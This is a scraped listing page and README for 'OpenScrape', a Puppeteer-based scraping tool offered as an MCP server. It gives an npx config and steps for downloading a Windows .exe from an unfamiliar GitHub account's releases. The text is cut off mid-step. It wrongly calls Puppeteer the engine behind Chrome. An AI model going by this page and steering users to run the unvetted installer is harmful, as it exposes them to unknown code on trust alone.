in20cuu37-lgtm/OpenScrape
Scrape web content using Puppeteer with an interactive CLI to extract titles, descriptions, links, headings, paragraphs, and full text efficiently.
Platform-specific configuration:
{
"mcpServers": {
"OpenScrape": {
"command": "npx",
"args": [
"-y",
"OpenScrape"
]
}
}
}Add the config above to .claude/settings.json under the mcpServers key.
[](https://github.com/in20cuu37-lgtm/OpenScrape/releases)
OpenScrape is a command-line tool that helps you gather information from websites. You can extract titles, descriptions, links, headings, paragraphs, and full text from any web page. It uses Puppeteer, the engine behind the Chrome browser, to make sure it grabs the most accurate data.
OpenScrape also works with MCP servers, which lets you run scraping tasks automatically and handle multiple web pages at once. This makes it useful for people who want to collect data from the internet without programming.
You do not need to know how to code to use this tool. It works on Windows and has clear steps to get started.
To run OpenScrape on your Windows PC, your system should meet these requirements:
You do not need any special software before running OpenScrape. The tool includes everything it needs.
Follow these steps to download and start OpenScrape on your Windows computer.
You will need to visit the release page to get the latest version of OpenScrape.
Click the big button below to open the download page:
[](https://github.com/in20cuu37-lgtm/OpenScrape/releases)
On the release page, locate the latest version. Look for the Windows executable file. It usually ends with .exe and may have the version number in the name, such as OpenScrape_Setup_v1.2.exe.
Click the file name to download it. The browser may ask you to confirm the download. Choose "Save" and wait for the
Loading reviews...